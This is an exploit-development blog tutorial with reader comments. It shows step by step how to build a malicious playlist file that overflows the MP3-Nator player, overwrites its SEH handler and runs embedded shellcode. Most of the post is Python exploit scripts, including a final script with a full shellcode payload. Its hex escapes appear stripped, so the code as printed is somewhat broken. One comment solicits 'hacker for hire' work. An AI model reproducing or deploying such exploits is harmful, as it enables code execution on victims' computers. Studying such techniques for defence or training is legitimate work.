Today i have re-exploited a software called mp3-nator. SEH based is bit challenging. I am going to show you quickly that how i exploited this SEH based vulnerable using only following tools:
1. Immunity Debugger.
2. mona.py (Corelan).
3. Metasploit(For shellcode).
4. Vulnerable Application
print "Creating expoit."
f=open("nator.plf","w") #Create the file
push="A"*6000
try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"
After generating the “nator.plf” we need to open the file:
1. Click on PlayList menu
2. Load PlayList.
3. Open the nator.plf.
But unfortunately it is not going to overwrite the EIP at all because of SEH.
EDX,EBP,ESI and EDI holding our own buffer(We can replace with shellcode!). But SEH also got overwritten by our buffer:
Overwriting SEH mean we can control SEH and Next SEH, Which mean we can make the SEH to divert the call to your shellcode!
The simple mona command is : pattern_create 6000 and replace “A” with the pattern saved in indicated location(For me it is on: C:monaMP3N) . Re-generate the nator.plf and open with Mp3-nator on Immunity and we see:
We see SEH and Next SEH got overwritten with mona’s pattern. Actually this time we need to find out how much junk buffer we need to reach the SEH(Same as EIP). Let’s find:
Now we are sure that we need 4112 bytes to overwrite SEH. To be 100% sure we are going to test it again:
print "Creating expoit."
f=open("nator.plf","w") #Create the file
push="A"*4108 #4112-4
push+="B"*4 #Next SEH
push+="C"*4 #SEH
push+="D"*2000 #Shellcode
try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"
If next SEH is “BBBB” and SEH is “CCCC” then we are ready to go ๐ .
Anyway, I have choose the address 0x00448f7a of MP3N.exe. Since we have Null byte at our return address so we simply can’t put our shellcode normally as we did before.
Now our exploit:
The simple way to explain this,
2608+343+1152+5=4108 .
Anyway, Let’s get back to debugger and do some test:
print "Creating expoit."
f=open("nator.plf","w") #Create the file
#343 bytes shellcode
shellcode ="D"*343
nops ="x90"*1152
jump ="xe9x2bxf8xffxff" #Jump back -2000 bytes
nseh ="xebxeax90x90" #short jump
seh ="x7ax8fx44x00" #0x00448f7a
more="x90"*1000
try:
f.write(junk+shellcode+nops+jump+nseh+seh+more)
f.close()
print "File created"
except:
print "File cannot be created"
Open the application on debugger,run and search the SEH address 0x00448f7a . Set a breakpoint by pressing F2.
After pressing SHIFT+F9 we hit the breakpoint. Now press F8 until we reach nop:
So it is time to put our real shellcode. Here is the final script:
print "Creating expoit."
f=open("nator.plf","w") #Create the file
junk="x90"*2608
#343 bytes shellcode
shellcode =("xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
"x42x30x42x50x42x30x4bx48x45x54x4ex43x4bx38x4ex47"
"x45x50x4ax57x41x30x4fx4ex4bx58x4fx54x4ax41x4bx38"
"x4fx45x42x42x41x50x4bx4ex49x44x4bx38x46x33x4bx48"
"x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c"
"x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x46x50x45x47x45x4ex4bx58"
"x4fx45x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx44"
"x4bx48x4fx55x4ex41x41x30x4bx4ex4bx58x4ex41x4bx38"
"x41x50x4bx4ex49x48x4ex45x46x32x46x50x43x4cx41x33"
"x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47"
"x4ex30x4bx48x42x44x4ex50x4bx58x42x37x4ex51x4dx4a"
"x4bx48x4ax36x4ax30x4bx4ex49x50x4bx38x42x58x42x4b"
"x42x50x42x50x42x50x4bx38x4ax36x4ex43x4fx45x41x53"
"x48x4fx42x46x48x35x49x38x4ax4fx43x48x42x4cx4bx57"
"x42x45x4ax36x42x4fx4cx38x46x30x4fx35x4ax46x4ax39"
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46"
"x4ex46x43x36x42x50x5a")
nops ="x90"*1152
jump ="xe9x2bxf8xffxff" #Jump back -2000 bytes
nseh ="xebxeax90x90" #short jump
seh ="x7ax8fx44x00" #0x00448f7a
more="x90"*1000
try:
f.write(junk+shellcode+nops+jump+nseh+seh+more)
f.close()
print "File created"
except:
print "File cannot be created"
Note: I have copied the shellcode from an working exploit. But you can always generate shellcode using metasploit. Do so!
And pop up the calc:
I have tried to make it simple. If you want to know more about SEH base Exploits , corelan has very good tutorial about SEH:
https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ and
Good luck and happy hunting!!!
This is great tutorial and simple. Thanks for publishing the tutorial !
Did you use any software for doing a calculation ?
This comment has been removed by the author.
Yeah, metasm of metasploit and python .
Nice tutorial . You can work with us as "Hacker for hire" if you wish! Contact us on hiring@sechacker.com
Again, Nice tutorial!
SecHacker
http://www.sechacker.com
in kali i tried command /usr/share/metasploit-framewrk/lib/metasm/ruby metasm.rb jmp $-2000 it doesnt wrk ๐ please guide
Very useful. Thank you so much!